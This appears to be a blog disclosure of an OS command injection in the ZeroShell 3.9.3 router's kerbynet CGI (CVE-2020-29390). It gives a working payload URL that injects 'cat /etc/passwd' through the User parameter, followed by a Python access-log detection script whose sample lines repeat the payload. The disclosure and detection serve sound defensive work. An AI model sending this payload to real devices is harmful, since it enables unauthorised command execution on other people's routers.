ZeroShell Linux Router 3.9.3 OS Command Injection vulnerability (CVE-2020-29390)
Vendor:
Zeroshell Linux Router
https://zeroshell.org/
Product:
ZeroShell-3.9.3-X86.iso
https://zeroshell.org/download/
Zeroshell is a Linux-based distribution dedicated to the implementation of Router and Firewall Appliances completely administrable via web interface. Zeroshell is available for x86/x86-64 platforms and ARM based devices such as Raspberry Pi.
OS Command Injection
When I reviewed the earlier vulnerabilities in Zeroshell, I discovered that an OS Command Injection vulnerability still exists in its latest version. You can download it here.
Payload: /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat /etc/passwd%0a'&PW=
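For defenders, the request above leaves a recognisable trace in web access logs: a `StartSessionSubmit` request to `/cgi-bin/kerbynet` whose decoded `User` value contains a quote or a newline. The following detection sketch is an added example, not part of the original post or of Zeroshell; the log format (common/combined), the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a common/combined access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.*?) HTTP/\d(?:\.\d)?"')
# The payload above relies on a single quote and a newline (%0a). The other
# shell metacharacters in this set are an assumption added for wider coverage.
SUSPICIOUS = re.compile(r"[\x00-\x1f'`;|&$]")

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2020:10:00:00 +0000] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User=admin&PW= HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Dec/2020:10:00:05 +0000] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%0Acat%20/etc/passwd%0A%27&PW= HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Dec/2020:10:00:09 +0000] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User=\'%0acat /etc/passwd%0a\'&PW= HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Dec/2020:10:00:12 +0000] "GET / HTTP/1.1" 200 100',
]

def suspicious_login(line):
    """Return the decoded User value if the line matches the injection pattern, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # The target may contain raw spaces, so it is taken as everything up to " HTTP/x.y".
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/cgi-bin/kerbynet"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if "StartSessionSubmit" not in params.get("Action", []):
        return None
    for user in params.get("User", []):
        if SUSPICIOUS.search(user):
            return user
    return None

def scan(lines):
    """Return (line_number, decoded_user) for every flagged line, numbering from 1."""
    hits = []
    for n, line in enumerate(lines, 1):
        user = suspicious_login(line)
        if user is not None:
            hits.append((n, user))
    return hits

if __name__ == "__main__":
    for n, user in scan(SAMPLE_LOG):
        print(f"line {n}: suspicious User value {user!r}")
```

Access logs only record the request line, so parameters sent in a POST body are not covered by this check.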
Reference
- Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution
- https://cwe.mitre.org/data/definitions/78.html
This post is licensed under CC BY 4.0 by the author.